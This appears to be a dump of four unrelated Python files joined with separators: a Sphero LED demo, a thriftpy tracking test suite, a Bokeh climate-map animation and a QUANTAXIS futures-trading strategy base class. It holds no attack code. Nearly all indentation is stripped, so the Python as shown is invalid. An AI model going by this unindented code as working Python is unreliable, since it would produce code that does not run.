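# A minimal example of the event and LED API documented above. It assumes `api`
# is an already-connected instance of the class defined in this file; scanning
# for and connecting to a toy is not shown in this section, so that step is omitted.
def _example_blink_on_collision(api):
    """Flash the main LED red on collision, then strobe it, as a small demo."""
    def on_collision(api_instance):
        # Listeners run in a newly spawned thread (see register_event above).
        api_instance.set_main_led(Color(r=255, g=0, b=0))
    api.register_event(EventType.on_collision, on_collision)
    # 15 red blinks in roughly 3 seconds, per the strobe() docstring.
    api.strobe(Color(255, 57, 66), (3 / 15) * .5, 15)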
|
test_tracking.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import contextlib
import os
import multiprocessing
import time
import tempfile
import pickle
import thriftpy
try:
import dbm
except ImportError:
import dbm.ndbm as dbm
import pytest
from thriftpy.contrib.tracking import TTrackedProcessor, TTrackedClient, \
TrackerBase, track_thrift
from thriftpy.contrib.tracking.tracker import ctx
from thriftpy.thrift import TProcessorFactory, TClient, TProcessor
from thriftpy.server import TThreadedServer
from thriftpy.transport import TServerSocket, TBufferedTransportFactory, \
TTransportException, TSocket
from thriftpy.protocol import TBinaryProtocolFactory
addressbook = thriftpy.load(os.path.join(os.path.dirname(__file__),
"addressbook.thrift"))
_, db_file = tempfile.mkstemp()
class SampleTracker(TrackerBase):
def record(self, header, exception):
db = dbm.open(db_file, 'w')
key = "%s:%s" % (header.request_id, header.seq)
db[key.encode("ascii")] = pickle.dumps(header.__dict__)
db.close()
tracker = SampleTracker("test_client", "test_server")
class Dispatcher(object):
def __init__(self):
self.ab = addressbook.AddressBook()
self.ab.people = {}
def ping(self):
return True
def hello(self, name):
return "hello %s" % name
def sleep(self, ms):
return True
def remove(self, name):
person = addressbook.Person(name="mary")
with client(port=16098) as c:
c.add(person)
return True
def get_phonenumbers(self, name, count):
return [addressbook.PhoneNumber(number="sdaf"),
addressbook.PhoneNumber(number='saf')]
def add(self, person):
with client(port=16099) as c:
c.get_phonenumbers("jane", 1)
with client(port=16099) as c:
c.ping()
return True
def get(self, name):
raise addressbook.PersonNotExistsError()
class TSampleServer(TThreadedServer):
def __init__(self, processor_factory, trans, trans_factory, prot_factory):
self.daemon = False
self.processor_factory = processor_factory
self.trans = trans
self.itrans_factory = self.otrans_factory = trans_factory
self.iprot_factory = self.oprot_factory = prot_factory
self.closed = False
def handle(self, client):
processor = self.processor_factory.get_processor()
itrans = self.itrans_factory.get_transport(client)
otrans = self.otrans_factory.get_transport(client)
iprot = self.iprot_factory.get_protocol(itrans)
oprot = self.oprot_factory.get_protocol(otrans)
try:
while True:
processor.process(iprot, oprot)
except TTransportException:
pass
except Exception:
raise
itrans.close()
otrans.close()
def gen_server(port=16029, tracker=tracker, processor=TTrackedProcessor):
args = [processor, addressbook.AddressBookService, Dispatcher()]
if tracker:
args.insert(1, tracker)
processor = TProcessorFactory(*args)
server_socket = TServerSocket(host="localhost", port=port)
server = TSampleServer(processor, server_socket,
prot_factory=TBinaryProtocolFactory(),
trans_factory=TBufferedTransportFactory())
ps = multiprocessing.Process(target=server.serve)
ps.start()
return ps, server
@pytest.fixture
def server(request):
ps, ser = gen_server()
time.sleep(0.15)
def fin():
if ps.is_alive():
ps.terminate()
request.addfinalizer(fin)
return ser
@pytest.fixture
def server1(request):
ps, ser = gen_server(port=16098)
time.sleep(0.15)
def fin():
if ps.is_alive():
ps.terminate()
request.addfinalizer(fin)
return ser
@pytest.fixture
def server2(request):
ps, ser = gen_server(port=16099)
time.sleep(0.15)
def fin():
if ps.is_alive():
ps.terminate()
request.addfinalizer(fin)
return ser
@pytest.fixture
def not_tracked_server(request):
ps, ser = gen_server(port=16030, tracker=None, processor=TProcessor)
time.sleep(0.15)
def fin():
if ps.is_alive():
ps.terminate()
request.addfinalizer(fin)
return ser
@contextlib.contextmanager
def client(client_class=TTrackedClient, port=16029):
socket = TSocket("localhost", port)
try:
trans = TBufferedTransportFactory().get_transport(socket)
proto = TBinaryProtocolFactory().get_protocol(trans)
trans.open()
args = [addressbook.AddressBookService, proto]
if client_class.__name__ == TTrackedClient.__name__:
args.insert(0, tracker)
yield client_class(*args)
finally:
trans.close()
@pytest.fixture
def dbm_db(request):
db = dbm.open(db_file, 'n')
db.close()
def fin():
try:
os.remove(db_file)
except OSError:
pass
request.addfinalizer(fin)
@pytest.fixture
def tracker_ctx(request):
def fin():
if hasattr(ctx, "header"):
del ctx.header
if hasattr(ctx, "counter"):
del ctx.counter
request.addfinalizer(fin)
def test_negotiation(server):
with client() as c:
assert c._upgraded is True
def test_tracker(server, dbm_db, tracker_ctx):
with client() as c:
c.ping()
time.sleep(0.2)
db = dbm.open(db_file, 'r')
headers = list(db.keys())
assert len(headers) == 1
request_id = headers[0]
data = pickle.loads(db[request_id])
assert "start" in data and "end" in data
data.pop("start")
data.pop("end")
assert data == {
"request_id": request_id.decode("ascii").split(':')[0],
"seq": '1',
"client": "test_client",
"server": "test_server",
"api": "ping",
"status": True,
"annotation": {},
"meta": {},
}
def test_tracker_chain(server, server1, server2, dbm_db, tracker_ctx):
test_meta = {'test': 'test_meta'}
with client() as c:
with SampleTracker.add_meta(**test_meta):
c.remove("jane")
c.hello("yes")
time.sleep(0.2)
db = dbm.open(db_file, 'r')
headers = list(db.keys())
assert len(headers) == 5
headers = [pickle.loads(db[i]) for i in headers]
headers.sort(key=lambda x: x["seq"])
assert len(set([i["request_id"] for i in headers])) == 2
seqs = [i["seq"] for i in headers]
metas = [i["meta"] for i in headers]
assert seqs == ['1', '1.1', '1.1.1', '1.1.2', '2']
assert metas == [test_meta] * 5
def test_exception(server, dbm_db, tracker_ctx):
with pytest.raises(addressbook.PersonNotExistsError):
with client() as c:
c.get("jane")
db = dbm.open(db_file, 'r')
headers = list(db.keys())
assert len(headers) == 1
header = pickle.loads(db[headers[0]])
assert header["status"] is False
def test_not_tracked_client_tracked_server(server):
with client(TClient) as c:
c.ping()
c.hello("world")
def test_tracked_client_not_tracked_server(not_tracked_server):
with client(port=16030) as c:
assert c._upgraded is False
c.ping()
c.hello("cat")
a = c.get_phonenumbers("hello", 54)
assert len(a) == 2
assert a[0].number == 'sdaf' and a[1].number == 'saf'
def test_request_id_func():
ctx.__dict__.clear()
header = track_thrift.RequestHeader()
header.request_id = "hello"
header.seq = 0
tracker = TrackerBase()
tracker.handle(header)
header2 = track_thrift.RequestHeader()
tracker.gen_header(header2)
assert header2.request_id == "hello"
def test_annotation(server, dbm_db, tracker_ctx):
with client() as c:
with SampleTracker.annotate(ann="value"):
c.ping()
with SampleTracker.annotate() as ann:
ann.update({"sig": "c.hello()", "user_id": "125"})
c.hello()
time.sleep(0.2)
db = dbm.open(db_file, 'r')
headers = list(db.keys())
data = [pickle.loads(db[i]) for i in headers]
data.sort(key=lambda x: x["seq"])
assert data[0]["annotation"] == {"ann": "value"} and \
data[1]["annotation"] == {"sig": "c.hello()", "user_id": "125"}
def test_counter(server, dbm_db, tracker_ctx):
with client() as c:
c.get_phonenumbers("hello", 1)
with SampleTracker.counter():
c.ping()
c.hello("counter")
c.sleep(8)
time.sleep(0.2)
db = dbm.open(db_file, 'r')
headers = list(db.keys())
data = [pickle.loads(db[i]) for i in headers]
data.sort(key=lambda x: x["api"])
get, hello, ping, sleep = data
assert get["api"] == "get_phonenumbers" and get["seq"] == '1'
assert ping["api"] == "ping" and ping["seq"] == '1'
assert hello["api"] == "hello" and hello["seq"] == '2'
assert sleep["api"] == "sleep" and sleep["seq"] == '2'
|
animate_widgets.py
|
# -*- coding: utf-8 -*-
# **Exercise: Animate the timeseries plot**
# In[1]:
# Imports
from threading import Thread
import datetime
import logging
import time
import numpy as np
import netCDF4
import pandas as pd
from bokeh.plotting import vplot, hplot, cursession, curdoc, output_server, show
from bokeh.models.widgets import Button, Icon
from viz import climate_map, timeseries, legend, get_slice
# In[2]:
# Data
data = netCDF4.Dataset('data/Land_and_Ocean_LatLong1.nc')
t = data.variables['temperature']
df = pd.read_csv('data/Land_Ocean_Monthly_Anomaly_Average.csv', parse_dates=[0])
# In[3]:
# Output option
output_server("climate")
# In[4]:
from bokeh.plotting import figure
# Data
year = 1850
month = 1
years = [str(x) for x in np.arange(1850, 2015, 1)]
months = [str(x) for x in np.arange(1, 13, 1)]
months_str = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']
month_str = months_str[month-1]
date = datetime.date(year, month, 1)
df['moving_average'] = pd.rolling_mean(df['anomaly'], 12)
df = df.fillna(0)
# New text Plot
title = figure(width=1200, height=100, x_range=(0, 1200), y_range=(0, 100), toolbar_location=None,
x_axis_type=None, y_axis_type=None, outline_line_color="#FFFFFF", tools="", min_border=0)
title.text(x=500, y=5, text=[month_str], text_font_size='36pt', text_color='black', name="month", text_font="Georgia")
title.text(x=350, y=5, text=[str(year)], text_font_size='36pt', text_color='black', name="year",text_font="Georgia")
# In[5]:
# Plots
climate_map = climate_map()
timeseries = timeseries()
legend = legend()
# ADD WIDGETS
play = True
def play_handler():
print("button_handler: start click")
global play
play = True
def stop_handler():
print("button_handler: stop click")
global play
play = False
button_start = Button(label="Start", type="success")
button_start.on_click(play_handler)
button_stop = Button(label="Stop", type="danger")
button_stop.on_click(stop_handler)
controls = hplot(button_start, button_stop)
# In[6]:
# New circle in timeseries plot
timeseries.circle(x=[date], y=[df[df.datetime == date].moving_average], size=8, name="circle")
# In[7]:
# Create layout
map_legend = hplot(climate_map, legend)
layout = vplot(controls, title, map_legend, timeseries)
# In[8]:
# Show
show(layout)
# In[9]:
# Select data source for climate_map and month and year
renderer = climate_map.select(dict(name="image"))
ds = renderer[0].data_source
month_renderer = title.select(dict(name="month"))
month_ds = month_renderer[0].data_source
year_renderer = title.select(dict(name="year"))
year_ds = year_renderer[0].data_source
# Select data source for timeseries data
timeseries_renderer = timeseries.select(dict(name="circle"))
timeseries_ds = timeseries_renderer[0].data_source
def should_play():
"""
Return true if we should play animation, otherwise block
"""
global play
while True:
if play:
return True
else:
time.sleep(0.05)
def background_thread(ds, year_ds, month_ds, timeseries_ds):
"""Plot animation, update data if play is True, otherwise stop"""
try:
while True:
for year_index in np.arange(2000, 2015, 1):
year_ds.data["text"] = [str(year_index)]
for month_index in np.arange(1, 13, 1):
if should_play():
month_ds.data["text"] = [months_str[month_index-1]]
image = get_slice(t, year_index, month_index)
date = datetime.date(year_index, month_index, 1)
timeseries_ds.data["x"] = [date]
timeseries_ds.data["y"] = [df[df.datetime == date].moving_average]
ds.data["image"] = [image]
cursession().store_objects(ds, year_ds, month_ds, timeseries_ds)
time.sleep(0.5)
time.sleep(0.5)
except:
logging.exception("An error occurred")
raise
# spin up a background thread
Thread(target=background_thread, args=(ds, year_ds, month_ds, timeseries_ds)).start()
# endlessly poll
cursession().poll_document(curdoc(), 0.04)
|
qactabase.py
|
import copy
import datetime
import json
import os
import re
import sys
import threading
import time
import uuid
import pandas as pd
import pymongo
import requests
from qaenv import (eventmq_amqp, eventmq_ip, eventmq_password, eventmq_port,
eventmq_username, mongo_ip, mongo_uri)
from QUANTAXIS.QAPubSub.consumer import subscriber, subscriber_routing, subscriber_topic
from QUANTAXIS.QAPubSub.producer import publisher_routing, publisher_topic
import QUANTAXIS as QA
from QUANTAXIS.QAStrategy.util import QA_data_futuremin_resample
from QUANTAXIS.QIFI.QifiAccount import ORDER_DIRECTION, QIFI_Account
from QUANTAXIS.QAEngine.QAThreadEngine import QA_Thread
from QUANTAXIS.QAUtil.QAParameter import MARKET_TYPE, RUNNING_ENVIRONMENT
from QUANTAXIS.QAARP import QA_Risk, QA_User  # used by debug()/run_backtest() below but missing from the imports
class QAStrategyCtaBase():
def __init__(self, code='rb2005', frequence='1min', strategy_id='QA_STRATEGY', risk_check_gap=1, portfolio='default',
start='2020-01-01', end='2020-05-21', init_cash=1000000, send_wx=False,
data_host=eventmq_ip, data_port=eventmq_port, data_user=eventmq_username, data_password=eventmq_password,
trade_host=eventmq_ip, trade_port=eventmq_port, trade_user=eventmq_username, trade_password=eventmq_password,
taskid=None, mongo_ip=mongo_ip, model='py'):
"""
code 可以传入单个标的 也可以传入一组标的(list)
会自动基于code来判断是什么市场
TODO: 支持多个市场同时存在
self.trade_host 交易所在的eventmq的ip [挂ORDER_ROUTER的]
"""
self.username = 'admin'
self.password = 'admin'
self.trade_host = trade_host
self.code = code
self.frequence = frequence
self.strategy_id = strategy_id
self.portfolio = portfolio
self.data_host = data_host
self.data_port = data_port
self.data_user = data_user
self.data_password = data_password
self.trade_host = trade_host
self.trade_port = trade_port
self.trade_user = trade_user
self.trade_password = trade_password
self.start = start
self.end = end
self.init_cash = init_cash
self.taskid = taskid
self.running_time = ''
self.market_preset = QA.QAARP.MARKET_PRESET()
self._market_data = []
self.risk_check_gap = risk_check_gap
self.latest_price = {}
self.isupdate = False
self.model = model
self.new_data = {}
self._systemvar = {}
self._signal = []
self.send_wx = send_wx
if isinstance(self.code, str):
self.last_order_towards = {self.code: {'BUY': '', 'SELL': ''}}
else:
self.last_order_towards = dict(
zip(self.code, [{'BUY': '', 'SELL': ''} for i in range(len(self.code))]))
self.dt = ''
if isinstance(self.code, str):
self.market_type = MARKET_TYPE.FUTURE_CN if re.search(
r'[a-zA-z]+', self.code) else MARKET_TYPE.STOCK_CN
else:
self.market_type = MARKET_TYPE.FUTURE_CN if re.search(
r'[a-zA-z]+', self.code[0]) else MARKET_TYPE.STOCK_CN
self.bar_order = {'BUY_OPEN': 0, 'SELL_OPEN': 0,
'BUY_CLOSE': 0, 'SELL_CLOSE': 0}
self._num_cached = 120
self._cached_data = []
self.user_init()
@property
def bar_id(self):
return len(self._market_data)
@property
def BarsSinceEntryLong(self):
return self.bar_id - self.bar_order.get('BUY_OPEN', self.bar_id)
@property
def BarsSinceEntryShort(self):
return self.bar_id - self.bar_order.get('SELL_OPEN', self.bar_id)
@property
def EntryPriceLong(self):
code = self.get_code()
return self.get_positions(code).open_price_long
@property
def EntryPriceShort(self):
code = self.get_code()
return self.get_positions(code).open_price_short
def on_sync(self):
if self.running_mode != 'backtest':
self.pubacc.pub(json.dumps(self.acc.message),
routing_key=self.strategy_id)
def _debug_sim(self):
self.running_mode = 'sim'
if self.frequence.endswith('min'):
if isinstance(self.code, str):
self._old_data = QA.QA_fetch_get_future_min('tdx', self.code.upper(), QA.QA_util_get_last_day(
QA.QA_util_get_real_date(str(datetime.date.today()))), str(datetime.datetime.now()), self.frequence)[:-1].set_index(['datetime', 'code'])
self._old_data = self._old_data.assign(volume=self._old_data.trade).loc[:, [
'open', 'high', 'low', 'close', 'volume']]
else:
self._old_data = pd.concat([QA.QA_fetch_get_future_min('tdx', item.upper(), QA.QA_util_get_last_day(
QA.QA_util_get_real_date(str(datetime.date.today()))), str(datetime.datetime.now()), self.frequence)[:-1].set_index(['datetime', 'code']) for item in self.code], sort=False)
self._old_data = self._old_data.assign(volume=self._old_data.trade).loc[:, [
'open', 'high', 'low', 'close', 'volume']]
else:
self._old_data = pd.DataFrame()
self.database = pymongo.MongoClient(mongo_ip).QAREALTIME
self.client = self.database.account
self.subscriber_client = self.database.subscribe
self.acc = QIFI_Account(
username=self.strategy_id, password=self.strategy_id, trade_host=mongo_ip, init_cash=self.init_cash)
self.acc.initial()
self.acc.on_sync = self.on_sync
self.pub = publisher_routing(exchange='QAORDER_ROUTER', host=self.trade_host,
port=self.trade_port, user=self.trade_user, password=self.trade_password)
self.pubacc = publisher_topic(exchange='QAAccount', host=self.trade_host,
port=self.trade_port, user=self.trade_user, password=self.trade_password)
if isinstance(self.code, str):
self.subscribe_data(self.code.lower(), self.frequence, self.data_host,
self.data_port, self.data_user, self.data_password, self.model)
else:
self.subscribe_multi(self.code, self.frequence, self.data_host,
self.data_port, self.data_user, self.data_password, self.model)
print('account {} start sim'.format(self.strategy_id))
self.database.strategy_schedule.job_control.update(
{'strategy_id': self.strategy_id},
{'strategy_id': self.strategy_id, 'taskid': self.taskid,
'filepath': os.path.abspath(__file__), 'status': 200}, upsert=True)
def debug_sim(self):
self._debug_sim()
threading.Thread(target=self.sub.start, daemon=True).start()
def run_sim(self):
self._debug_sim()
self.sub.start()
def run_backtest(self):
self.debug()
self.acc.save()
risk = QA_Risk(self.acc)
risk.save()
try:
"""add rank flow if exist
QARank是我们内部用于评价策略ELO的库 此处并不影响正常使用
"""
from QARank import QA_Rank
QA_Rank(self.acc).send()
except:
pass
def user_init(self):
"""
用户自定义的init过程
"""
pass
def debug(self):
self.running_mode = 'backtest'
self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS
user = QA_User(username=self.username, password=self.password)
port = user.new_portfolio(self.portfolio)
self.acc = port.new_accountpro(
account_cookie=self.strategy_id, init_cash=self.init_cash, market_type=self.market_type, frequence=self.frequence)
self.positions = self.acc.get_position(self.code)
print(self.acc)
print(self.acc.market_type)
data = QA.QA_quotation(self.code.upper(), self.start, self.end, source=QA.DATASOURCE.MONGO,
frequence=self.frequence, market=self.market_type, output=QA.OUTPUT_FORMAT.DATASTRUCT)
data.data.apply(self.x1, axis=1)
def x1(self, item):
self.latest_price[item.name[1]] = item['close']
if str(item.name[0])[0:10] != str(self.running_time)[0:10]:
self.on_dailyclose()
self.on_dailyopen()
if self.market_type == QA.MARKET_TYPE.STOCK_CN:
print('backtest: Settle!')
self.acc.settle()
self._on_1min_bar()
self._market_data.append(copy.deepcopy(item))
self.running_time = str(item.name[0])
self.on_bar(item)
def debug_t0(self):
self.running_mode = 'backtest'
self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS
user = QA_User(username=self.username, password=self.password)
port = user.new_portfolio(self.portfolio)
self.acc = port.new_accountpro(
account_cookie=self.strategy_id, init_cash=self.init_cash, init_hold={
self.code: 100000},
market_type=self.market_type, running_environment=RUNNING_ENVIRONMENT.TZERO)
self.positions = self.acc.get_position(self.code)
data = QA.QA_quotation(self.code.upper(), self.start, self.end, source=QA.DATASOURCE.MONGO,
frequence=self.frequence, market=self.market_type, output=QA.OUTPUT_FORMAT.DATASTRUCT)
def x1(item):
self.latest_price[item.name[1]] = item['close']
if str(item.name[0])[0:10] != str(self.running_time)[0:10]:
self.on_dailyclose()
for order in self.acc.close_positions_order:
order.trade('closebySys', order.price,
order.amount, order.datetime)
self.on_dailyopen()
if self.market_type == QA.MARKET_TYPE.STOCK_CN:
print('backtest: Settle!')
self.acc.settle()
self._on_1min_bar()
self._market_data.append(copy.deepcopy(item))
self.running_time = str(item.name[0])
self.on_bar(item)
data.data.apply(x1, axis=1)
def debug_currenttick(self, freq):
data = QA.QA_fetch_get_future_transaction_realtime(
'tdx', self.code.upper())
self.running_mode = 'backtest'
self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS
user = QA_User(username=self.username, password=self.password)
port = user.new_portfolio(self.portfolio)
self.strategy_id = self.strategy_id + \
'currenttick_{}_{}'.format(str(datetime.date.today()), freq)
self.acc = port.new_accountpro(
account_cookie=self.strategy_id, init_cash=self.init_cash, market_type=self.market_type)
self.positions = self.acc.get_position(self.code)
data = data.assign(price=data.price/1000).loc[:, ['code', 'price', 'volume']].resample(
freq).apply({'code': 'last', 'price': 'ohlc', 'volume': 'sum'}).dropna()
data.columns = data.columns.droplevel(0)
data = data.reset_index().set_index(['datetime', 'code'])
def x1(item):
self.latest_price[item.name[1]] = item['close']
if str(item.name[0])[0:10] != str(self.running_time)[0:10]:
self.on_dailyclose()
self.on_dailyopen()
self._on_1min_bar()
self._market_data.append(copy.deepcopy(item))
self.running_time = str(item.name[0])
self.on_bar(item)
data.apply(x1, axis=1)
def debug_histick(self, freq):
data = QA.QA_fetch_get_future_transaction(
'tdx', self.code.upper(), self.start, self.end)
self.running_mode = 'backtest'
self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS
user = QA_User(username=self.username, password=self.password)
port = user.new_portfolio(self.portfolio)
self.strategy_id = self.strategy_id + \
'histick_{}_{}_{}'.format(self.start, self.end, freq)
self.acc = port.new_accountpro(
account_cookie=self.strategy_id, init_cash=self.init_cash, market_type=self.market_type)
self.positions = self.acc.get_position(self.code)
data = data.assign(price=data.price/1000).loc[:, ['code', 'price', 'volume']].resample(
freq).apply({'code': 'last', 'price': 'ohlc', 'volume': 'sum'}).dropna()
data.columns = data.columns.droplevel(0)
data = data.reset_index().set_index(['datetime', 'code'])
def x1(item):
self.latest_price[item.name[1]] = item['close']
if str(item.name[0])[0:10] != str(self.running_time)[0:10]:
self.on_dailyclose()
self.on_dailyopen()
self._on_1min_bar()
self._market_data.append(copy.deepcopy(item))
self.running_time = str(item.name[0])
self.on_bar(item)
data.apply(x1, axis=1)
def subscribe_data(self, code, frequence, data_host, data_port, data_user, data_password, model='py'):
"""[summary]
Arguments:
code {[type]} -- [description]
frequence {[type]} -- [description]
"""
if frequence.endswith('min'):
if model == 'py':
self.sub = subscriber(exchange='realtime_{}_{}'.format(
frequence, code), host=data_host, port=data_port, user=data_user, password=data_password)
elif model == 'rust':
self.sub = subscriber_routing(exchange='realtime_{}'.format(
code), routing_key=frequence, host=data_host, port=data_port, user=data_user, password=data_password)
self.sub.callback = self.callback
elif frequence.endswith('s'):
import re
self._num_cached = 2*int(re.findall(r'\d+', self.frequence)[0])
self.sub = subscriber_routing(
exchange='CTPX', routing_key=code, host=data_host, port=data_port, user=data_user, password=data_password)
self.sub.callback = self.second_callback
elif frequence.endswith('tick'):
self._num_cached = 1
self.sub = subscriber_routing(
exchange='CTPX', routing_key=code, host=data_host, port=data_port, user=data_user, password=data_password)
self.sub.callback = self.tick_callback
def subscribe_multi(self, codelist, frequence, data_host, data_port, data_user, data_password, model='py'):
if frequence.endswith('min'):
if model == 'rust':
self.sub = subscriber_routing(exchange='realtime_{}'.format(
codelist[0]), routing_key=frequence, host=data_host, port=data_port, user=data_user, password=data_password)
for item in codelist[1:]:
self.sub.add_sub(exchange='realtime_{}'.format(
item), routing_key=frequence)
elif model == 'py':
self.sub = subscriber_routing(exchange='realtime_{}'.format(
codelist[0].lower()), routing_key=frequence, host=data_host, port=data_port, user=data_user, password=data_password)
for item in codelist[1:]:
self.sub.add_sub(exchange='realtime_{}'.format(
item.lower()), routing_key=frequence)
self.sub.callback = self.callback
elif frequence.endswith('tick'):
self._num_cached = 1
self.sub = subscriber_routing(exchange='CTPX', routing_key=codelist[0].lower(
), host=data_host, port=data_port, user=data_user, password=data_password)
for item in codelist[1:]:
self.sub.add_sub(exchange='CTPX', routing_key=item.lower())
self.sub.callback = self.tick_callback
@property
def old_data(self):
return self._old_data
def update(self):
"""
此处是切换bar的时候的节点
"""
self._old_data = self._market_data
self._on_1min_bar()
@property
def market_datetime(self):
"""计算的market时间点 此api慎用 因为会惰性计算全市场的值
Returns:
[type] -- [description]
"""
return self.market_data.index.levels[0]
@property
def market_data(self):
if self.running_mode == 'sim':
return self._market_data
elif self.running_mode == 'backtest':
return pd.concat(self._market_data[-100:], axis=1, sort=False).T
def force_close(self):
# force-close any open long and short positions
if self.positions.volume_long > 0:
self.send_order('SELL', 'CLOSE', price=self.positions.last_price,
volume=self.positions.volume_long)
if self.positions.volume_short > 0:
self.send_order('BUY', 'CLOSE', price=self.positions.last_price,
volume=self.positions.volume_short)
def upcoming_data(self, new_bar):
"""upcoming_bar :
在这一步中, 我们主要进行的是
1. 更新self._market_data
2. 更新账户
3. 更新持仓
4. 通知on_bar
Arguments:
new_bar {pd.DataFrame} -- [description]
"""
code = new_bar.index.levels[1][0]
if len(self._old_data) > 0:
self._market_data = pd.concat(
[self._old_data, new_bar], sort=False)
else:
self._market_data = new_bar
# QA.QA_util_log_info(self._market_data)
if self.isupdate:
self.update()
self.isupdate = False
self.update_account()
if isinstance(self.code, str):
self.positions.on_price_change(float(self.latest_price[code]))
else:
for item in self.code:
self.acc.get_position(item).on_price_change(
float(self.latest_price[code]))
self.on_bar(json.loads(
new_bar.reset_index().to_json(orient='records'))[0])
def ind2str(self, ind, ind_type):
z = ind.tail(1).reset_index().to_dict(orient='records')[0]
return json.dumps({'topic': ind_type, 'code': self.code, 'type': self.frequence, 'data': z})
def second_callback(self, a, b, c, body):
"""在strategy的callback中,我们需要的是
1. 更新数据
2. 更新bar
3. 更新策略状态
4. 推送事件
Arguments:
a {[type]} -- [description]
b {[type]} -- [description]
c {[type]} -- [description]
body {[type]} -- [description]
second ==> 2*second tick
b'{"ask_price_1": 4145.0, "ask_price_2": 0, "ask_price_3": 0, "ask_price_4": 0, "ask_price_5": 0,
"ask_volume_1": 69, "ask_volume_2": 0, "ask_volume_3": 0, "ask_volume_4": 0, "ask_volume_5": 0,
"average_price": 61958.14258714826,
"bid_price_1": 4143.0, "bid_price_2": 0, "bid_price_3": 0, "bid_price_4": 0, "bid_price_5": 0,
"bid_volume_1": 30, "bid_volume_2": 0, "bid_volume_3": 0, "bid_volume_4": 0, "bid_volume_5": 0,
"datetime": "2019-11-20 01:57:08", "exchange": "SHFE", "gateway_name": "ctp",
"high_price": 4152.0, "last_price": 4144.0, "last_volume": 0,
"limit_down": 3872.0, "limit_up": 4367.0, "local_symbol": "ag1912.SHFE",
"low_price": 4105.0, "name": "", "open_interest": 277912.0, "open_price": 4140.0,
"preSettlementPrice": 4120.0, "pre_close": 4155.0,
"symbol": "ag1912",
"volume": 114288}'
Ticks are updated/resampled based on the hot-data cache size self._num_cached.
"""
self.new_data = json.loads(str(body, encoding='utf-8'))
self._cached_data.append(self.new_data)
self.latest_price[self.new_data['symbol']
] = self.new_data['last_price']
# if len(self._cached_data) == self._num_cached:
# self.isupdate = True
if len(self._cached_data) > 3*self._num_cached:
# cap the amount of cached data
self._cached_data = self._cached_data[self._num_cached:]
data = pd.DataFrame(self._cached_data).loc[:, [
'datetime', 'last_price', 'volume']]
data = data.assign(datetime=pd.to_datetime(data.datetime)).set_index('datetime').resample(
self.frequence).apply({'last_price': 'ohlc', 'volume': 'last'}).dropna()
data.columns = data.columns.droplevel(0)
data = data.assign(volume=data.volume.diff(),
code=self.new_data['symbol'])
data = data.reset_index().set_index(['datetime', 'code'])
self.acc.on_price_change(
self.new_data['symbol'], self.latest_price[self.new_data['symbol']])
# .loc[:, ['open', 'high', 'low', 'close', 'volume', 'tradetime']]
now = datetime.datetime.now()
if now.hour == 20 and now.minute == 59 and now.second < 10:
self.daily_func()
time.sleep(10)
self.running_time = self.new_data['datetime']
# print(data.iloc[-1].index[0])
if self.dt != data.index[-1][0]:
self.isupdate = True
self.dt = data.index[-1][0]
self.upcoming_data(data.tail(1))
def tick_callback(self, a, b, c, body):
self.new_data = json.loads(str(body, encoding='utf-8'))
self.latest_price[self.new_data['symbol']
] = self.new_data['last_price']
self.running_time = self.new_data['datetime']
self.on_tick(self.new_data)
def get_code_marketdata(self, code):
return self.market_data.loc[(slice(None), code), :]
def get_current_marketdata(self):
return self.market_data.loc[(self.running_time, slice(None)), :]
def callback(self, a, b, c, body):
"""在strategy的callback中,我们需要的是
1. 更新数据
2. 更新bar
3. 更新策略状态
4. 推送事件
Arguments:
a {[type]} -- [description]
b {[type]} -- [description]
c {[type]} -- [description]
body {[type]} -- [description]
"""
self.new_data = json.loads(str(body, encoding='utf-8'))
self.latest_price[self.new_data['code']] = self.new_data['close']
if self.dt != str(self.new_data['datetime'])[0:16]:
# [0:16] is the number of characters in a minute-bar timestamp
self.dt = str(self.new_data['datetime'])[0:16]
self.isupdate = True
self.acc.on_price_change(self.new_data['code'], self.new_data['close'])
# .loc[:, ['open', 'high', 'low', 'close', 'volume', 'tradetime']]
bar = pd.DataFrame([self.new_data]).set_index(['datetime', 'code'])
now = datetime.datetime.now()
if now.hour == 20 and now.minute == 59 and now.second < 10:
self.daily_func()
time.sleep(10)
# res = self.job_control.find_one(
# {'strategy_id': self.strategy_id, 'strategy_id': self.strategy_id})
# self.control_status(res)
self.running_time = self.new_data['datetime']
self.upcoming_data(bar)
def control_status(self, res):
print(res)
def add_subscriber(self, qaproid):
"""Add a subscriber
增加订阅者的QAPRO_ID
"""
self.subscriber_client.insert_one(
{'strategy_id': self.strategy_id, 'user_id': qaproid})
@property
def subscriber_list(self):
"""订阅者
Returns:
[type] -- [description]
"""
return list(set([item['user_id'] for item in self.subscriber_client.find({'strategy_id': self.strategy_id})]))
def load_strategy(self):
raise NotImplementedError
def on_dailyopen(self):
pass
def on_dailyclose(self):
pass
def on_bar(self, bar):
raise NotImplementedError
def on_tick(self, tick):
raise NotImplementedError
def _on_1min_bar(self):
#raise NotImplementedError
if len(self._systemvar.keys()) > 0:
self._signal.append(copy.deepcopy(self._systemvar))
try:
self.on_1min_bar()
except:
pass
def on_deal(self, order):
"""
order is a dict type
"""
print('------this is on deal message ------')
print(order)
def on_1min_bar(self):
raise NotImplementedError
def on_5min_bar(self):
raise NotImplementedError
def on_15min_bar(self):
raise NotImplementedError
def on_30min_bar(self):
raise NotImplementedError
def order_handler(self):
self._orders = {}
def daily_func(self):
QA.QA_util_log_info('DAILY FUNC')
def risk_check(self):
pass
def plot(self, name, data, format):
""" plot是可以存储你的临时信息的接口, 后期会接入可视化
Arguments:
name {[type]} -- [description]
data {[type]} -- [description]
format {[type]} -- [description]
"""
self._systemvar[name] = {'datetime': copy.deepcopy(str(
self.running_time)), 'value': data, 'format': format}
def get_code(self):
if isinstance(self.code, str):
return self.code
else:
return self.code[0]
def check_order(self, direction, offset, code=None):
"""[summary]
同方向不开仓 只对期货市场做限制
buy - open
sell - close
"""
if code is None:
code = self.get_code()
if self.market_type == QA.MARKET_TYPE.FUTURE_CN:
if self.last_order_towards[code][direction] == str(offset):
return False
else:
return True
else:
return True
def on_ordererror(self, direction, offset, price, volume):
print('order Error ')
def receive_simpledeal(self,
code: str,
trade_time,
trade_amount,
direction,
offset,
trade_price,
message='sell_open'):
self.send_order(direction=direction, offset=offset,
volume=trade_amount, price=trade_price, order_id=QA.QA_util_random_with_topic(self.strategy_id))
